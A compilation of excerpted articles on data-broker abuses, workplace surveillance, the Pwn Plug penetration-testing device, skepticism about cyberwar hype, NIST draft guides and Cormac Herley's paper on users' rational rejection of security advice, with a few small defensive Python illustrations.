MEDbase isn’t the only company exploiting these loopholes. By the industry’s own estimates, there are something like 4,000 for-profit intel companies operating in the United States. Many of them sell information that would normally be restricted under federal law. They offer all sorts of targeted dossier collections on every population segment of our society, from the affluent to the extremely vulnerable.

If you want to see how this kind of profile data can be used to scam unsuspecting individuals, look no further than Richard Guthrie, an Iowa retiree who had his life savings siphoned out of his bank account. The scammers’ weapon of choice: databases bought from large for-profit data brokers listing retirees who entered sweepstakes and bought lottery tickets.

Here’s a 2007 New York Times story describing the racket:

Mr. Guthrie, who lives in Iowa, had entered a few sweepstakes that caused his name to appear in a database advertised by infoUSA, one of the largest compilers of consumer information. InfoUSA sold his name, and data on scores of other elderly Americans, to known lawbreakers, regulators say.

InfoUSA advertised lists of “Elderly Opportunity Seekers,” 3.3 million older people “looking for ways to make money,” and “Suffering Seniors,” 4.7 million people with cancer or Alzheimer’s disease. “Oldies but Goodies” contained 500,000 gamblers over 55 years old, for 8.5 cents apiece. One list said: “These people are gullible. They want to believe that their luck can change.”

Data brokers argue that cases like Guthrie’s are an anomaly — a once-in-a-blue-moon tragedy in an industry that takes privacy and legal conduct seriously. But cases of identity thieves and sophisticated con rings obtaining data from for-profit intel businesses abound. Scammers are a lucrative source of revenue. Their money is just as good as anyone else’s. And some of the profile “products” offered by the industry seem tailored specifically to fraudulent use.

As Royal Canadian Mounted Police Sergeant Yves Leblanc told the New York Times: “Only one kind of customer wants to buy lists of seniors interested in lotteries and sweepstakes: criminals. If someone advertises a list by saying it contains gullible or elderly people, it’s like putting out a sign saying ‘Thieves welcome here.’”

So what is InfoUSA, exactly? What kind of company would create and sell lists customized for use by scammers and cons?

As it turns out, InfoUSA is not some fringe or shady outfit, but a hugely profitable, politically connected company. InfoUSA was started by Vin Gupta in the 1970s as a basement operation hawking detailed lists of RV and mobile home dealers. The company quickly expanded into other areas and began providing business intel services to thousands of businesses. By 2000, the company had raised more than $30 million in venture capital funding from major Silicon Valley venture capital firms.

By then, InfoUSA boasted of having information on 230 million consumers. A few years later, InfoUSA counted the biggest Valley companies as its clients, including Google, Yahoo, Microsoft and AOL. It got involved not only in raw data and dossiers, but moved into payroll and financial services, conducted polling and opinion research, partnered with CNN, vetted employees and provided customized services for law enforcement and all sorts of federal and government agencies: processing government payments, helping states locate tax cheats and even administering President Bill Clinton’s “Welfare to Work” program. Which is not surprising, as Vin Gupta is a major and close political supporter of Bill and Hillary Clinton.

In 2008, Gupta was sued by InfoUSA shareholders for inappropriately using corporate funds. Shareholders accused Gupta of illegally funneling corporate money to fund an extravagant lifestyle and curry political favor. According to the Associated Press, the lawsuit questioned why Gupta used private corporate jets to fly the Clintons on personal and campaign trips, and why Gupta awarded Bill Clinton a $3.3 million consulting gig.

As a result of the scandal, InfoUSA was threatened with delisting from Nasdaq, Gupta was forced out and the company was snapped up for half a billion dollars by CCMP Capital Advisors, a major private equity firm spun off from JP Morgan in 2006. Today, InfoUSA continues to do business under the name Infogroup, and has nearly 4,000 employees working in nine countries.

As big as Infogroup is, there are dozens of other for-profit intelligence businesses that are even bigger: massive multi-national intel conglomerates with revenues in the billions of dollars. Some of them, like Lexis-Nexis and Experian, are well known, but mostly these are outfits that few Americans have heard of, with names like Epsilon, Altegrity and Acxiom.

These for-profit intel behemoths are involved in everything from debt collection to credit reports to consumer tracking to healthcare analysis, and provide all manner of tailored services to government and law enforcement around the world. For instance, Acxiom has done business with most major corporations, and boasts of intel on “500 million active consumers worldwide, with about 1,500 data points per person. That includes a majority of adults in the United States,” according to the New York Times.

This data is analyzed and sliced in increasingly sophisticated and intrusive ways to profile and predict behavior. Merchants are using it to customize the shopping experience: Target launched a program to figure out if a woman shopper was pregnant and when the baby would be born, “even if she didn’t want us to know.” Life insurance companies are experimenting with predictive consumer intel to estimate life expectancy and determine eligibility for life insurance policies. Meanwhile, health insurance companies are combing through this data in order to deny and challenge the medical claims of their policyholders.

Even more alarming, large employers are turning to for-profit intelligence to mine and monitor the lifestyles and habits of their workers outside the workplace. Earlier this year, the Wall Street Journal described how employers have partnered with health insurance companies to monitor workers for “health-adverse” behavior that could lead to higher medical expenses down the line:

Your company already knows whether you have been taking your meds, getting your teeth cleaned and going for regular medical checkups. Now some employers or their insurance companies are tracking what staffers eat, where they shop and how much weight they are putting on — and taking action to keep them in line.

But companies also have started scrutinizing employees’ other behavior more discreetly. Blue Cross and Blue Shield of North Carolina recently began buying spending data on more than 3 million people in its employer group plans. If someone, say, purchases plus-size clothing, the health plan could flag him for potential obesity — and then call or send mailings offering weight-loss solutions.

…”Everybody is using these databases to sell you stuff,” says Daryl Wansink, director of health economics for the Blue Cross unit. “We happen to be trying to sell you something that can get you healthier.”

“As an employer, I want you on that medication that you need to be on,” Julie Stone, an HR expert at Towers Watson, told the Wall Street Journal.

Companies might try to frame it as a health issue. I mean, what kind of asshole could be against employers caring about the wellbeing of their workers? But their ultimate concern has nothing to do with employee health. It’s all about the brutal bottom line: keeping costs down.

An employer monitoring and controlling your activity outside of work? You don’t have to be a union agitator to see the problems with this kind of mindset and where it could lead. There are lots of things that some employers might want to know about your personal life, and not only to “keep costs down.” It could be anything: weeding out people based on undesirable habits, or discriminating against workers based on sexual orientation, religion and political beliefs.

It’s not difficult to imagine that a large corporation facing labor unrest or a unionization drive would be interested in proactively flagging potential troublemakers by pinpointing employees who might be sympathetic to the cause. And the technology and data are already here for wide and easy application: did a worker watch certain political documentaries, donate to environmental non-profits, join an animal rights Facebook group, tweet out support for Occupy Wall Street, subscribe to the Nation or Jacobin, buy Naomi Klein’s “Shock Doctrine”? Or maybe the worker simply rented one of Michael Moore’s films? Run your payroll through one of the massive consumer intel databases and see if there are any matches. Bound to be plenty of unpleasant surprises for HR!

This has happened in the past, although in a cruder and more limited way. In the 1950s, for instance, some lefty intellectuals had their lefty newspapers and mags delivered to P.O. boxes instead of their home address, worrying that otherwise they’d get tagged as Commie symps. That might have worked in the past. But with the power of private intel companies, today there’s nowhere to hide.

FTC Commissioner Julie Brill has repeatedly voiced concern that unregulated data being amassed by for-profit intel companies would be used to discriminate and deny employment, and to determine consumer access to everything from credit to insurance to housing. “As Big Data algorithms become more accurate and powerful, consumers need to know a lot more about the ways in which their data is used,” she told the Wall Street Journal.

Pam Dixon, executive director of the World Privacy Forum, agrees. Dixon frequently testifies on Capitol Hill to warn about the growing danger to privacy and civil liberties posed by big data and for-profit intelligence. In Congressional testimony back in 2009, Dixon called this growing mountain of data the “modern permanent record” and explained that users of these new intel capabilities will inevitably expand to include not just marketers and law enforcement, but insurance companies, employers, landlords, schools, parents, scammers and stalkers. “The information – like credit reports – will be used to make basic decisions about the ability of individuals to travel, participate in the economy, find opportunities, find places to live, purchase goods and services, and make judgments about the importance, worthiness, and interests of individuals.”

* * *

For the past year, Chairman John D. (Jay) Rockefeller IV has been conducting a Senate Commerce Committee investigation of the data broker industry and how it affects consumers. The committee finished its investigation last week without reaching any real conclusions, but issued a report warning about the dangers posed by the for-profit intel industry and the need for further action by lawmakers. The report noted with concern that many of these firms failed to cooperate with the investigation into their business practices:

Data brokers operate behind a veil of secrecy. Three of the largest companies – Acxiom, Experian, and Epsilon – to date have been similarly secretive with the Committee with respect to their practices, refusing to identify the specific sources of their data or the customers who purchase it. … The refusal by several major data broker companies to provide the Committee complete responses regarding data sources and customers only reinforces the aura of secrecy surrounding the industry.

Rockefeller’s investigation was an important first step breaking open this secretive industry, but it was missing one notable element. Despite its focus on companies that feed on people’s personal data, the investigation did not include Google or the other big Surveillance Valley data munchers. And that’s too bad. Because if anything, the investigation into data brokers only highlighted the danger posed by the consumer-facing data companies like Google, Facebook, Yahoo and Apple.

As intrusive as data brokers are, the level of detail in the information they compile on Americans pales in comparison to what can be vacuumed up by a company like Google. To compile their dossiers, traditional data brokers rely on mostly indirect intel: what people buy, where they vacation, what websites they visit. Google, on the other hand, has access to the raw, uncensored contents of your inner life: personal emails, chats, the diary entries and medical records that we store in the cloud, our personal communication with doctors, lawyers, psychologists, friends. Data brokers know us through our spending habits. Google accesses the unfiltered details of our personal lives.

A recent study showed that Americans are overwhelmingly opposed to having their online activity tracked and analyzed. Seventy-three percent of people polled for the Pew Internet & American Life Project viewed the tracking of their search history as an invasion of privacy, while 68 percent were against targeted advertising, replying: “I don’t like having my online behavior tracked and analyzed.”

This isn’t news to companies like Google, which last year warned shareholders: “Privacy concerns relating to our technology could damage our reputation and deter current and potential users from using our products and services.”

Little wonder then that Google, and the rest of Surveillance Valley, is terrified that the conversation about surveillance could soon broaden to include not only government espionage, but for-profit spying as well.

[Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder

Compare with Assange: Facebook, Google, Yahoo as spying tools for US intelligence

As the “single most powerful tool for population control,” the CIA’s “Facebook program” has dramatically reduced the agency’s costs — at least according to the latest “report” from the satirical mag The Onion.

Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook “the most appalling spy machine that has ever been invented,” The Onion‘s video fires a number of arrows in Facebook’s direction — with hilarious results.

In the video, Facebook founder Mark Zuckerberg is dubbed “The Overlord” and is shown receiving a “medal of intelligence commendation” for his work with the CIA’s Facebook program.

The Onion also takes a jab at FarmVille (which is responsible for “pacifying” as many as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).

Check out the video below and tell us in the comments what you think.

CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network

[Apr 17, 2012] The Pwn Plug is a little white box that can hack your network By Robert McMillan

wired.com


Easy to overlook, the PwnPlug offers a tiny back door to the corporate network

When Jayson E. Street broke into the branch office of a national bank in May of last year, the branch manager could not have been more helpful. Dressed like a technician, Street walked in and said he was there to measure “power fluctuations on the power circuit.” To do this, he’d need to plug a small white device that looked like a power adapter into the wall.

The power fluctuation story was total BS, of course. Street had been hired by the bank to test out security at 10 of its West Coast branch offices. He was conducting what's called a penetration test. This is where security experts pretend to be bad guys in order to spot problems.

In this test, bank employees were only too willing to help out. They let Street go anywhere he wanted—near the teller windows, in the vault—and plug in his little white device, called a Pwn Plug.

"At one branch, the bank manager got out of the way so I could put it behind her desk," Street says. The bank, which Street isn't allowed to name, called the test off after he'd broken into the first four branches. "After the fourth one they said, 'Stop now please. We give up.'"

Built by a startup company called Pwnie Express, the Pwn Plug is pretty much the last thing you ever want to find on your network—unless you've hired somebody to put it there. It's a tiny computer that comes preloaded with an arsenal of hacking tools. It can be quickly plugged into any computer network and then used to access it remotely from afar. And it comes with "stealthy decal stickers"—including a little green flowerbud with the word "fresh" underneath it, that makes the device look like an air freshener—so that people won't get suspicious.

[Photo: The Pwn Plug installed during Street's May penetration test. Credit: Jayson E. Street]

The basic model costs $480, but if you're willing to pay an extra $250 for the Elite version, you can connect it over the mobile wireless network. "The whole point is plug and pwn," says Dave Porcello, Pwnie Express's CEO. "Walk into a facility, plug it in, wait for the text message. Before you even get to the parking lot you should know it's working."

Porcello decided to start making the Pwn Plug after coming across the SheevaPlug, a miniature low-power Linux computer built by Globalscale Technologies that looks just like a power adapter. “I saw it and I was like, ‘Oh my god, this is the hacker’s dropbox,’” Porcello says. Dropboxes have been around for a few decades, but until now they’ve been customized computers that hackers or pen testers like Street build and sneak, unobserved, onto corporate networks.

Now Pwnie Express has taken the idea commercial and built a product that anyone can easily configure and use. It turns out the devices are also a great way for corporations to test security at their regional offices. Porcello says that Bank of America is mailing Pwn Plugs to its regional offices and having bank managers plug them into the network. Then security experts at corporate HQ can check the network for vulnerabilities.

Another customer, an Internet service provider that Porcello wasn’t allowed to name, is using the devices to remotely connect to regional offices via a GSM mobile wireless network and troubleshoot networking problems.

The device can save companies big money, Porcello says. “You’ve got companies like T.J.Maxx that have thousands of retail stores and every single one of them has got a computer network,” he says. “Right now they’re actually flying people out to the stores to spot check and do penetration tests, but now with something like this you don’t have to travel.”

Porcello was just a bored security manager at an insurance company when he started building the Pwn Plugs back in 2010. But pretty soon he was selling enough to quit his day job. "We started getting orders from Fortune 50 companies and the DoD and I was like, 'OK I'll do this now instead.'"

[Feb 15, 2012] Cyberwar Is the New Yellowcake Threat Level By Jerry Brito and Tate Watkins

Now all this needs to be reassessed using the latest NSA revelations...
February 14, 2012 | Wired.com

In last month’s State of the Union address, President Obama called on Congress to pass “legislation that will secure our country from the growing dangers of cyber threats.” The Hill was way ahead of him, with over 50 cybersecurity bills introduced this Congress. This week, both the House and Senate are moving on their versions of consolidated, comprehensive legislation.

The reason cybersecurity legislation is so pressing, proponents say, is that we face an immediate risk of national disaster.

“Today’s cyber criminals have the ability to interrupt life-sustaining services, cause catastrophic economic damage, or severely degrade the networks our defense and intelligence agencies rely on,” Senate Commerce Committee Chairman Jay Rockefeller (D-W.Va.) said at a hearing last week. “Congress needs to act on comprehensive cybersecurity legislation immediately.”

Yet evidence to sustain such dire warnings is conspicuously absent. In many respects, rhetoric about cyber catastrophe resembles threat inflation we saw in the run-up to the Iraq War. And while Congress’ passing of comprehensive cybersecurity legislation wouldn’t lead to war, it could saddle us with an expensive and overreaching cyber-industrial complex.

In 2002 the Bush administration sought to make the case that Iraq threatened its neighbors and the United States with weapons of mass destruction (WMD). By framing the issue in terms of WMD, the administration conflated the threats of nuclear, biological, and chemical weapons. The destructive power of biological and chemical weapons—while no doubt horrific—is minor compared to that of nuclear detonation. Conflating these threats, however, allowed the administration to link the unlikely but serious threat of a nuclear attack to the more likely but less serious threat posed by biological and chemical weapons.

Similarly, proponents of regulation often conflate cyber threats.

In his 2010 bestseller Cyber War, Richard Clarke warns that a cyberattack today could result in the collapse of the government’s classified and unclassified networks, the release of “lethal clouds of chlorine gas” from chemical plants, refinery fires and explosions across the country, midair collisions of 737s, train derailments, the destruction of major financial computer networks, suburban gas pipeline explosions, a nationwide power blackout, and satellites in space spinning out of control. He assures us that “these are not hypotheticals.” But the only verifiable evidence he presents relates to several well-known distributed denial of service (DDOS) attacks, and he admits that DDOS is a “primitive” form of attack that would not pose a major threat to national security.

When Clarke ventures beyond DDOS attacks, his examples are easily debunked. To show that the electrical grid is vulnerable, for example, he suggests that the Northeast power blackout of 2003 was caused in part by the “Blaster” worm. But the 2004 final report of the joint U.S.-Canadian task force that investigated the blackout found that no virus, worm, or other malicious software contributed to the power failure. Clarke also points to a 2007 blackout in Brazil, which he says was the result of criminal hacking of the power system. Yet investigations have concluded that the power failure was the result of soot deposits on high-voltage insulators on transmission lines.

Clarke’s readers would no doubt be as frightened at the prospect of a cyber attack as they might have been at the prospect of Iraq passing nuclear weapons to al Qaeda. Yet evidence that cyberattacks and cyberespionage are real and serious concerns is not evidence that we face a grave risk of national catastrophe, just as evidence of chemical or biological weapons is not evidence of the ability to launch a nuclear strike.

The Bush administration claimed that Iraq was close to acquiring nuclear weapons but provided no verifiable evidence. The evidence they did provide—Iraq’s alleged pursuit of uranium “yellowcake” from Niger and its purchase of aluminum tubes allegedly meant for uranium enrichment centrifuges—was ultimately determined to be unfounded.

Despite the lack of verifiable evidence to support the administration’s claims, the media tended to report them unquestioned. Initial reporting on the aluminum tubes claim, for example, came in the form of a front page New York Times article by Judith Miller and Michael Gordon that relied entirely on anonymous administration sources.

Appearing on Meet the Press the same day the story was published, Vice President Dick Cheney answered a question about evidence of a reconstituted Iraqi nuclear program by stating that, while he couldn’t talk about classified information, The New York Times was reporting that Iraq was seeking to acquire aluminum tubes to build a centrifuge. In essence, the Bush administration was able to cite its own leak—with the added imprimatur of the Times—as a rationale for war.

The media may be contributing to threat inflation today by uncritically reporting alarmist views of potential cyber threats. For example, a 2009 front page Wall Street Journal story reported that the U.S. power grid had been penetrated by Chinese and Russian hackers and laced with logic bombs. The article is often cited as evidence that the power grid is rigged to blow.

Yet similar to Judith Miller’s Iraq WMD reporting, the only sources for the article’s claim that infrastructure has been compromised are anonymous U.S. intelligence officials. With little specificity about the alleged infiltrations, readers are left with no way to verify the claims. More alarmingly, when Sen. Susan Collins (R-Maine) took to the Senate floor to introduce the comprehensive cybersecurity bill that she co-authored with Sen. Joe Lieberman (I-Conn.), the evidence she cited to support a pressing need for regulation included this very Wall Street Journal story.

Washington teems with people who have a vested interest in conflating and inflating threats to our digital security. The watchword, therefore, should be “trust but verify.” In his famous farewell address to the nation in 1961, President Dwight Eisenhower warned against the dangers of what he called the “military-industrial complex”: an excessively close nexus between the Pentagon, defense contractors, and elected officials that could lead to unnecessary expansion of the armed forces, superfluous military spending, and a breakdown of checks and balances within the policy making process. Eisenhower’s speech proved prescient.

Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.

Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.

Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren’t doing real security any favors.

Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.

Disentangle the disparate dangers that have been lumped together under the “cybersecurity” label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.

UPDATE 2.14.12: Story was updated to correct the name of the worm that was supposed to have affected the Northeast power grid.

draft_sp800-128-ipd.pdf (850 KB) DRAFT Guide for Security Configuration Management of Information Systems

March 2010 | NIST

NIST announces the publication of Initial Public Draft Special Publication 800-128, Guide for Security Configuration Management of Information Systems. The publication provides guidelines for managing the configuration of information system architectures and associated components for secure processing, storing, and transmitting of information. Security configuration management is an important function for establishing and maintaining secure information system configurations, and provides important support for managing organizational risks in information systems.

NIST SP 800-128 identifies the major phases of security configuration management and describes the process of applying security configuration management practices to information systems, including: (i) planning security configuration management activities for the organization; (ii) planning security configuration management activities for the information system; (iii) configuring the information system to a secure state; (iv) maintaining the configuration of the information system in a secure state; and (v) monitoring the configuration of the information system to ensure that the configuration is not inadvertently altered from its approved state.
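The monitoring phase in particular lends itself to automation. As a minimal sketch (my own illustration, not an excerpt from SP 800-128; the file path and contents below are hypothetical), configuration drift can be detected by fingerprinting configuration files and comparing them against an approved baseline:

```python
import hashlib

def fingerprint(content: bytes) -> str:
    """Return a SHA-256 fingerprint of a configuration file's contents."""
    return hashlib.sha256(content).hexdigest()

def detect_drift(baseline: dict, current: dict) -> dict:
    """Compare current config fingerprints against the approved baseline.

    Returns files that were changed, removed, or added relative to the
    approved secure state -- the kind of deviation the monitoring phase
    is meant to surface."""
    changed = [f for f in baseline if f in current and baseline[f] != current[f]]
    removed = [f for f in baseline if f not in current]
    added = [f for f in current if f not in baseline]
    return {"changed": changed, "removed": removed, "added": added}

# Hypothetical example: an approved sshd setting is silently altered.
baseline = {"/etc/ssh/sshd_config": fingerprint(b"PermitRootLogin no\n")}
current = {"/etc/ssh/sshd_config": fingerprint(b"PermitRootLogin yes\n")}
print(detect_drift(baseline, current))
```

A real implementation would read the files from disk on a schedule and feed findings into the organization's change-control process.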

The security configuration management concepts and principles described in this publication provide supporting information for NIST SP 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations, which includes the Configuration Management family of security controls as well as other security controls that draw upon configuration management activities. This publication also provides important supporting information for the Monitor Step (Step 6) of the Risk Management Framework that is discussed in NIST SP 800-37, Revision 1, Guide for Applying the Risk Management Framework to Federal Information Systems: A Security Life Cycle Approach.

NIST requests comments on the Initial Public Draft of Special Publication 800-128, by June 14, 2010. Please submit comments to sec-cert@nist.gov.

[May 08, 2010] Are users right in rejecting security advice

TechRepublic.com

I now understand why my friend insisted I listen to Episode 229 of the Security Now series. He wanted to introduce me to Cormac Herley, Principal Researcher at Microsoft, and his paper, “So Long, and No Thanks for the Externalities: The Rational Rejection of Security Advice by Users.”

Dr. Herley introduced the paper this past September at the New Security Paradigms Workshop, a fitting venue. See if you agree after reading the group’s mandate:

“NSPW’s focus is on work that challenges the dominant approaches and perspectives in computer security. In the past, such challenges have taken the form of critiques of existing practice as well as novel, sometimes controversial, and often immature approaches to defending computer systems.

By providing a forum for important security research that isn’t suitable for mainstream security venues, NSPW aims to foster paradigm shifts in information security.”

Herley’s paper is of special interest to the group. Not only does it meet one of NSPW’s tenets by being outside the mainstream; it also forces a rethink of what’s important when it comes to computer security.

Radical thinking

To get an idea of what the paper is about, here’s a quote from the introduction:

“We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort. Looking at various examples of security advice we find that the advice is complex and growing, but the benefit is largely speculative or moot.”

The above diagram (courtesy of Cormac Herley) shows what he considers as direct and indirect costs. So, is Herley saying that heeding advice about computer security is not worth it? Let’s find out.

Who’s right

Researchers have different ideas as to why people fail to use security measures. Some feel that regardless of what happens, users will only do the minimum required. Others believe security tasks are rejected because users consider them to be a pain. A third group maintains user education is not working.

Herley offers a different viewpoint. He contends that user rejection of security advice is based entirely on the economics of the process. He offers the following as reasons why:

To explain

As I read the paper, I sensed Herley was coaxing me to stop thinking like an IT professional and start thinking like a mainstream user. That way, I would understand the following:

Cost versus benefit

I wasn’t making the connection between cost-benefit trade-offs and IT security. My son, an astute business-type, had to explain that costs and benefits do not always directly refer to financial gains or losses. After hearing that, things started making sense. One such cost analysis was described by Steve Gibson in the podcast.

Gibson simply asked: how often do you require passwords to be changed? I asked several system administrators what time frame they used; most responded once a month. Using Herley’s logic, that means an attacker potentially has a whole month to use the password.

So, is the cost of having users struggle with a new password every month beneficial? Before you answer, you may also want to think about the bad practices users adopt because of the frequent-change policy:

Is anything truly gained by having passwords changed often? The only benefit I see is if the attacker does not use the password within the password-refresh time limit. What’s your opinion? Is changing passwords monthly a benefit or a cost?
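To make the trade-off concrete, here is a back-of-the-envelope sketch (my own illustration, not from Herley’s paper): if an attacker steals a password at a uniformly random point in its rotation cycle, the expected remaining validity is half the rotation interval, so monthly rotation still leaves the attacker an average two-week window:

```python
def expected_exposure_days(rotation_days: int) -> float:
    """Average number of days a stolen password stays valid, assuming
    the theft happens at a uniformly random point in the rotation cycle."""
    return rotation_days / 2

# Monthly rotation still leaves the attacker ~15 days on average,
# while users pay the full cost of memorizing a new password each month.
print(expected_exposure_days(30))
print(expected_exposure_days(90))
```

The benefit shrinks only linearly as rotation gets more frequent, while the user's burden (and the workarounds it provokes) grows; that is the unfavorable cost-benefit trade-off in miniature.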

Dr. Herley does an in-depth cost-benefit analysis in three specific areas, password rules, phishing URLs, and SSL certificate errors. I would like to spend some time with each.

Password rules

Password rules place the entire burden on the user, so users understand the cost of having to abide by the following rules:

The report proceeds to explain how each rule is not really helpful. For example, the first three rules are not important, as most applications and Web sites have a lockout rule that restricts access after so many tries. I already touched on why “Change it often” is not considered helpful.

All said and done, users know that strictly observing the above rules is no guarantee of being safe from exploits. That makes it difficult for them to justify the additional effort and associated cost.

Phishing URLs

Trying to explain URL spoofing to users is complicated. Besides, by the time you get through half of all possible iterations, most users are not listening. For example, the following slide (courtesy of Cormac Herley) lists some spoofed URLs for PayPal:

To reduce cost to users, Herley wants to turn this around. He explains that users need to know when the URL is good, not bad:

“The main difficulty in teaching users to read URLs is that in certain cases this allows users to know when something is bad, but it never gives a guarantee that something is good. Thus the advice cannot be exhaustive and is full of exceptions.”
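One way to act on that observation is an allowlist: instead of teaching users to spot every bad URL pattern, check whether the hostname is on a short list of known-good hosts. A minimal sketch (my own illustration; the trusted hosts are assumptions for the example):

```python
from urllib.parse import urlsplit

# Illustrative allowlist -- a real one would come from the user's bank,
# browser vendor, or password manager, not be hard-coded.
TRUSTED_HOSTS = {"paypal.com", "www.paypal.com"}

def looks_trusted(url: str) -> bool:
    """Allowlist check: a URL counts as good only if its full hostname is
    one we explicitly trust. Anything else -- including lookalikes such as
    www.paypal.com.evil.example -- fails the check."""
    host = urlsplit(url).hostname or ""
    return host.lower() in TRUSTED_HOSTS

print(looks_trusted("https://www.paypal.com/signin"))         # genuine host
print(looks_trusted("http://www.paypal.com.evil.example/x"))  # spoofed host
```

This inverts the burden Herley describes: the rule is short, exhaustive, and positive ("these hosts are good"), rather than an open-ended list of exceptions.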

Certificate errors

For the most part, people understand SSL, the significance of https, and are willing to put up with the additional burden to keep their personal and financial information safe. Certificate errors are a different matter. Users do not understand their significance and for the most part ignore them.

I’m as guilty as the next person when it comes to certificate warnings. I feel like I’m taking a chance, yet what other options are available? After reading the report, I am not as concerned. Why? Statistics show that virtually all certificate errors are false positives.

The report also reflects the irony of thinking that ignored certificate warnings will lead to problems. Typically, bad guys do not use SSL on their phishing sites and if they do, they are going to make sure their certificates work, not wanting to bring any undue attention to their exploit. Herley states it this way:

“Even if 100% of certificate errors are false positives it does not mean that we can dispense with certificates. However, it does mean that for users the idea that certificate errors are a useful tool in protecting them from harm is entirely abstract and not evidence-based. The effort we ask of them is real, while the harm we warn them of is theoretical.”
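Herley’s argument here is really about base rates. A quick Bayes’-rule sketch (the numbers are illustrative assumptions, not measured rates) shows why: when real attacks behind certificate warnings are rare and benign misconfigurations are common, almost every warning a user sees is a false positive:

```python
def p_attack_given_warning(p_attack: float,
                           p_warn_attack: float,
                           p_warn_benign: float) -> float:
    """Bayes' rule: probability that a certificate warning signals a
    real attack, given the base rate of attacks and the warning rates
    for attack vs. benign connections."""
    numerator = p_warn_attack * p_attack
    denominator = numerator + p_warn_benign * (1 - p_attack)
    return numerator / denominator

# Assumed numbers: attacks on one in a million connections, half of
# attacks trigger a warning, 1% of benign sites are misconfigured.
# The posterior comes out around 0.005% -- nearly all warnings are noise.
print(p_attack_given_warning(p_attack=1e-6,
                             p_warn_attack=0.5,
                             p_warn_benign=0.01))
```

Under assumptions anywhere near these, the user who ignores warnings is almost always right, which is exactly why the advice fails the cost-benefit test.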

Outside the box

There you have it. Is that radical-enough thinking for you? It is for me. That said, Dr. Herley offers the following advice:

“We do not wish to give the impression that all security advice is counter-productive. In fact, we believe our conclusions are encouraging rather than discouraging. We have argued that the cost-benefit trade off for most security advice is simply unfavorable: users are offered too little benefit for too much cost.

Better advice might produce a different outcome. This is better than the alternative hypothesis that users are irrational. This suggests that security advice that has compelling cost-benefit trade off has real chance of user adoption. However, the costs and benefits have to be those the user cares about, not those we think the user ought to care about.”

Herley offers further advice in the paper to help us get out of this mess.

Final thoughts

The big picture idea I am taking away from Dr. Herley’s paper is that users have never been offered security. All the advice, policies, directives, and what not offered in the name of IT security only promotes reduced risk. Could changing that be the paradigm shift needed to get information security on track?

I want to thank Dr. Cormac Herley for his thought-provoking paper and e-mail conversation.

[Apr 21, 2009] SP 800-118 DRAFT Guide to Enterprise Password Management

Apr. 21, 2009 | NIST

NIST announces that Draft Special Publication (SP) 800-118, Guide to Enterprise Password Management, has been released for public comment. SP 800-118 is intended to help organizations understand and mitigate common threats against their character-based passwords. The guide focuses on topics such as defining password policy requirements and selecting centralized and local password management solutions.

NIST requests comments on draft SP 800-118 by May 29, 2009. Please submit comments to 800-118comments@nist.gov with "Comments SP 800-118" in the subject line.

draft-sp800-118.pdf (181 KB)

Threat of 'cyberwar' has been hugely hyped, by Bruce Schneier (CNN.com)

Editor's note: Bruce Schneier is a security technologist and author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." Read more of his writing at http://www.schneier.com/

(CNN) -- There's a power struggle going on in the U.S. government right now.

It's about who is in charge of cyber security, and how much control the government will exert over civilian networks. And by beating the drums of war, the military is coming out on top.

"The United States is fighting a cyberwar today, and we are losing," said former NSA director -- and current cyberwar contractor -- Mike McConnell. "Cyber 9/11 has happened over the last ten years, but it happened slowly so we don't see it," said former National Cyber Security Division director Amit Yoran. Richard Clarke, whom Yoran replaced, wrote an entire book hyping the threat of cyberwar.

General Keith Alexander, the current commander of the U.S. Cyber Command, hypes it every chance he gets. This isn't just rhetoric of a few over-eager government officials and headline writers; the entire national debate on cyberwar is plagued with exaggerations and hyperbole.

Googling those names and terms -- as well as "cyber Pearl Harbor," "cyber Katrina," and even "cyber Armageddon" -- gives some idea how pervasive these memes are. Prefix "cyber" to something scary, and you end up with something really scary.

Cyberspace has all sorts of threats, day in and day out. Cybercrime is by far the largest: fraud, through identity theft and other means, extortion, and so on. Cyber-espionage is another, both government- and corporate-sponsored. Traditional hacking, without a profit motive, is still a threat. So is cyber-activism: people, most often kids, playing politics by attacking government and corporate websites and networks.

These threats cover a wide variety of perpetrators, motivations, tactics, and goals. You can see this variety in what the media has mislabeled as "cyberwar." The attacks against Estonian websites in 2007 were simple hacking attacks by ethnic Russians angry at anti-Russian policies; these were denial-of-service attacks, a normal risk in cyberspace and hardly unprecedented.

A real-world comparison might be if an army invaded a country, then all got in line in front of people at the DMV so they couldn't renew their licenses. If that's what war looks like in the 21st century, we have little to fear.

Similar attacks against Georgia, which accompanied an actual Russian invasion, were also probably the responsibility of citizen activists or organized crime. A series of power blackouts in Brazil was caused by criminal extortionists -- or was it sooty insulators? China is engaging in espionage, not war, in cyberspace. And so on.

One problem is that there's no clear definition of "cyberwar." What does it look like? How does it start? When is it over? Even cybersecurity experts don't know the answers to these questions, and it's dangerous to broadly apply the term "war" unless we know a war is going on.

Yet recent news articles have claimed that China declared cyberwar on Google, that Germany attacked China, and that a group of young hackers declared cyberwar on Australia. (Yes, cyberwar is so easy that even kids can do it.) Clearly we're not talking about real war here, but a rhetorical war: like the war on terror.

